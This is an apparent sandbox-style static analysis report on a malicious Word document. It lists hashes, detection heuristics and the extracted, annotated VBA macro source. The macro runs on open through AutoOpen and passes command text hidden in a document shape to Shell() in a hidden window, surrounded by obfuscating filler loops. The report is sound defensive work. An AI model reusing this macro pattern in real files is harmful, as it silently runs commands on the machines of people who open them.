Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e68125b87c26994e…

MALICIOUS

Office (OLE)

85.6 KB · Created: 2018-11-14 18:30:00 · Authoring application: Microsoft Office Word · First seen: 2019-01-12
MD5: 117a844e3316355a212f072b690e8b64 SHA-1: e4ea826bdabe97a0903cb5f76aa45698566bd645 SHA-256: e68125b87c26994e9356cc2bc7e31ae6e3a16a8ec86975307efb481e1e927391
Risk score: 252

Heuristics (9)

  • ClamAV: Doc.Malware.Generic-6749944-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6749944-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    zUJFlJicq = Shell(kXzni + jnkzvjvW + EjjUhYd, ilZctzzmKUn)
       Dim ZUzhiii, ndAFu, CKBzNOJ, LvXibGJN
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
    Sub AutoOpen()
       Dim kKwwkmRTw, AmOwL, PIIsz, PYwFBdB
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body). This is the standard OOXML DrawingML schema namespace that Office writes into documents, not a host the macro contacts; it is context, not an indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4966 bytes
SHA-256: 769ed2f6feab58cb9fa2002ec0a5ad897f7f3e3b664073f85b8f7f0f4d8a3daf
Detection
ClamAV: No threats found
Obfuscation or payload: likely
47 of 75 identifiers look randomly generated (e.g. 'ilZctzzmKUn') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "FDMNzTmiz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: module header as exported by olevba. VB_Base names the
' Word ThisDocument module, so this code lives in the document itself;
' the module name "FDMNzTmiz" is random-looking, consistent with the
' name-mangling flagged in the report. No Option Explicit follows, so
' every undeclared name below is an implicit Variant (Empty until set).
Function hjJDmiUNU()
' Analyst note: worker routine, called once from AutoOpen. The only
' operative statements are the kXzni assignment and the Shell() call;
' every Dim/For block is filler. Each filler block takes Len() of a name
' that is never assigned anywhere in this listing, loops over a counter
' that is likewise never assigned, and stores the result in a variable
' that is never read again. With no Option Explicit those names are Empty
' Variants, so Len() should return 0 and the loops run zero times
' (NOTE(review): inferred from VBA semantics, confirm in a sandbox).
' The function never assigns its own name, so it returns Empty.
' Evaluates to 0; used below as Shell()'s window-style argument
' (0 = vbHide, i.e. the spawned process is started without a visible window).
Const ilZctzzmKUn = 607169607 - 607169607
   Dim bZqnv, EBdjvizJc, NZClznP, PDzqZUwL
    ' Filler block 1: VwGrCs and NZClznP never assigned; tnKUAwIFn never read.
    EBdjvizJc = Len(VwGrCs)
    PDzqZUwL = ""
    For bZqnv = 1 To EBdjvizJc
        PDzqZUwL = PDzqZUwL & (32 + ((NZClznP + 36) Mod 136))
        If NZClznP >= 22 And NZClznP <= 73 Then
            PDzqZUwL = PDzqZUwL & (37 + ((NZClznP + 46) Mod 147))
        Else
            PDzqZUwL = PDzqZUwL & (NZClznP)
        End If
    Next
tnKUAwIFn = PDzqZUwL

   Dim YrAOc, jkRiL, hKhqEaY, qCHDCOAwO
    ' Filler block 2: PKzii and hKhqEaY never assigned; vRhSd never read.
    jkRiL = Len(PKzii)
    qCHDCOAwO = ""
    For YrAOc = 1 To jkRiL
        qCHDCOAwO = qCHDCOAwO & (39 + ((hKhqEaY + 46) Mod 132))
        If hKhqEaY >= 33 And hKhqEaY <= 93 Then
            qCHDCOAwO = qCHDCOAwO & (15 + ((hKhqEaY + 48) Mod 174))
        Else
            qCHDCOAwO = qCHDCOAwO & (hKhqEaY)
        End If
    Next
vRhSd = qCHDCOAwO

' Command-line assembly. The substantive part is the text of the document
' shape named "zZuNbQu": the command string is stored in the document body,
' not in the macro source, which is why the extracted VBA alone does not
' show it. DfOJR, wLNInWJ, Ywfjf and SSkHpVk are not assigned anywhere in
' this listing (presumably Empty, contributing nothing -- confirm). The
' report's SC_STR_CMD finding suggests the shape text is a cmd.exe line.
' Detection: Shapes(...).TextFrame.ContainingRange feeding a Shell() call is
' the high-signal pattern to hunt for in this family of documents.
kXzni = "" + DfOJR + wLNInWJ + Shapes("zZuNbQu").TextFrame.ContainingRange + Ywfjf + SSkHpVk
   Dim dHEkwnQJR, Gjwtjm, htiim, QzwrhOu
    ' Filler block 3: acRJOEi and htiim never assigned; wUZBUmoq never read.
    Gjwtjm = Len(acRJOEi)
    QzwrhOu = ""
    For dHEkwnQJR = 1 To Gjwtjm
        QzwrhOu = QzwrhOu & (48 + ((htiim + 38) Mod 76))
        If htiim >= 10 And htiim <= 80 Then
            QzwrhOu = QzwrhOu & (43 + ((htiim + 13) Mod 115))
        Else
            QzwrhOu = QzwrhOu & (htiim)
        End If
    Next
wUZBUmoq = QzwrhOu

' Execution point (flagged as OLE_VBA_SHELL): runs the assembled command
' with window style ilZctzzmKUn (0). jnkzvjvW and EjjUhYd are not assigned
' in this listing. The returned task id (zUJFlJicq) is never used, so the
' macro does not wait on or inspect the child process.
zUJFlJicq = Shell(kXzni + jnkzvjvW + EjjUhYd, ilZctzzmKUn)
   Dim ZUzhiii, ndAFu, CKBzNOJ, LvXibGJN
    ' Filler block 4: tXimNMW and CKBzNOJ never assigned; ZZRYBVsJB never read.
    ndAFu = Len(tXimNMW)
    LvXibGJN = ""
    For ZUzhiii = 1 To ndAFu
        LvXibGJN = LvXibGJN & (12 + ((CKBzNOJ + 38) Mod 96))
        If CKBzNOJ >= 49 And CKBzNOJ <= 99 Then
            LvXibGJN = LvXibGJN & (21 + ((CKBzNOJ + 13) Mod 79))
        Else
            LvXibGJN = LvXibGJN & (CKBzNOJ)
        End If
    Next
ZZRYBVsJB = LvXibGJN

   Dim IXLkAbSjt, mjUFT, RtEowasc, topjn
    ' Filler block 5: LhKETU and RtEowasc never assigned; BvjaQm never read.
    mjUFT = Len(LhKETU)
    topjn = ""
    For IXLkAbSjt = 1 To mjUFT
        topjn = topjn & (29 + ((RtEowasc + 31) Mod 115))
        If RtEowasc >= 34 And RtEowasc <= 81 Then
            topjn = topjn & (41 + ((RtEowasc + 21) Mod 108))
        Else
            topjn = topjn & (RtEowasc)
        End If
    Next
BvjaQm = topjn

End Function
Sub AutoOpen()
' Analyst note: Word auto-exec entry point (flagged as OLE_VBA_AUTOOPEN);
' it runs when the document is opened with macros enabled. Its only
' operative statement is the bare call to hjJDmiUNU() in the middle of
' the body; the six Dim/For blocks around it are the same kind of filler
' as in hjJDmiUNU -- Len() of a name never assigned in this listing, a
' loop counter never assigned, and a result variable never read again.
' Nothing here returns a value or touches the document.
   Dim kKwwkmRTw, AmOwL, PIIsz, PYwFBdB
    ' Filler block 1: dTWzLEJ and PIIsz never assigned; MXmqGEuz never read.
    AmOwL = Len(dTWzLEJ)
    PYwFBdB = ""
    For kKwwkmRTw = 1 To AmOwL
        PYwFBdB = PYwFBdB & (16 + ((PIIsz + 30) Mod 88))
        If PIIsz >= 22 And PIIsz <= 63 Then
            PYwFBdB = PYwFBdB & (47 + ((PIIsz + 37) Mod 156))
        Else
            PYwFBdB = PYwFBdB & (PIIsz)
        End If
    Next
MXmqGEuz = PYwFBdB

   Dim cwaEG, LpoziJbt, vKsaKANk, HVWNtELM
    ' Filler block 2: isjJwwPHk and vKsaKANk never assigned; wwJioGPM never read.
    LpoziJbt = Len(isjJwwPHk)
    HVWNtELM = ""
    For cwaEG = 1 To LpoziJbt
        HVWNtELM = HVWNtELM & (16 + ((vKsaKANk + 29) Mod 119))
        If vKsaKANk >= 21 And vKsaKANk <= 73 Then
            HVWNtELM = HVWNtELM & (41 + ((vKsaKANk + 40) Mod 97))
        Else
            HVWNtELM = HVWNtELM & (vKsaKANk)
        End If
    Next
wwJioGPM = HVWNtELM

' The real work: invokes the function holding the Shell() call.
hjJDmiUNU
   Dim hCpCRoMlw, lzMZn, ccrzNqVSC, vOKXtbh
    ' Filler block 3: IUmfpF and ccrzNqVSC never assigned; GAsJMWI never read.
    lzMZn = Len(IUmfpF)
    vOKXtbh = ""
    For hCpCRoMlw = 1 To lzMZn
        vOKXtbh = vOKXtbh & (37 + ((ccrzNqVSC + 15) Mod 183))
        If ccrzNqVSC >= 19 And ccrzNqVSC <= 87 Then
            vOKXtbh = vOKXtbh & (47 + ((ccrzNqVSC + 33) Mod 180))
        Else
            vOKXtbh = vOKXtbh & (ccrzNqVSC)
        End If
    Next
GAsJMWI = vOKXtbh

   Dim kIMiG, XwfuRnZhI, TWacwjkC, THTBs
    ' Filler block 4: NMHYGikM and TWacwjkC never assigned; kBibLr never read.
    XwfuRnZhI = Len(NMHYGikM)
    THTBs = ""
    For kIMiG = 1 To XwfuRnZhI
        THTBs = THTBs & (21 + ((TWacwjkC + 28) Mod 52))
        If TWacwjkC >= 41 And TWacwjkC <= 80 Then
            THTBs = THTBs & (35 + ((TWacwjkC + 41) Mod 71))
        Else
            THTBs = THTBs & (TWacwjkC)
        End If
    Next
kBibLr = THTBs

   Dim jXzptwaaP, PBQSJz, lrXZmpjB, NSOhEYdS
    ' Filler block 5: PfAMJOqT and lrXZmpjB never assigned; kRJQuhS never read.
    PBQSJz = Len(PfAMJOqT)
    NSOhEYdS = ""
    For jXzptwaaP = 1 To PBQSJz
        NSOhEYdS = NSOhEYdS & (48 + ((lrXZmpjB + 27) Mod 61))
        If lrXZmpjB >= 23 And lrXZmpjB <= 95 Then
            NSOhEYdS = NSOhEYdS & (15 + ((lrXZmpjB + 29) Mod 186))
        Else
            NSOhEYdS = NSOhEYdS & (lrXZmpjB)
        End If
    Next
kRJQuhS = NSOhEYdS

   Dim ziknRXY, QOkHtbnR, KYJklV, GOiWPbBz
    ' Filler block 6: jpqFp and KYJklV never assigned; PTmjnolpN never read.
    QOkHtbnR = Len(jpqFp)
    GOiWPbBz = ""
    For ziknRXY = 1 To QOkHtbnR
        GOiWPbBz = GOiWPbBz & (33 + ((KYJklV + 31) Mod 124))
        If KYJklV >= 23 And KYJklV <= 59 Then
            GOiWPbBz = GOiWPbBz & (34 + ((KYJklV + 11) Mod 72))
        Else
            GOiWPbBz = GOiWPbBz & (KYJklV)
        End If
    Next
PTmjnolpN = GOiWPbBz

End Sub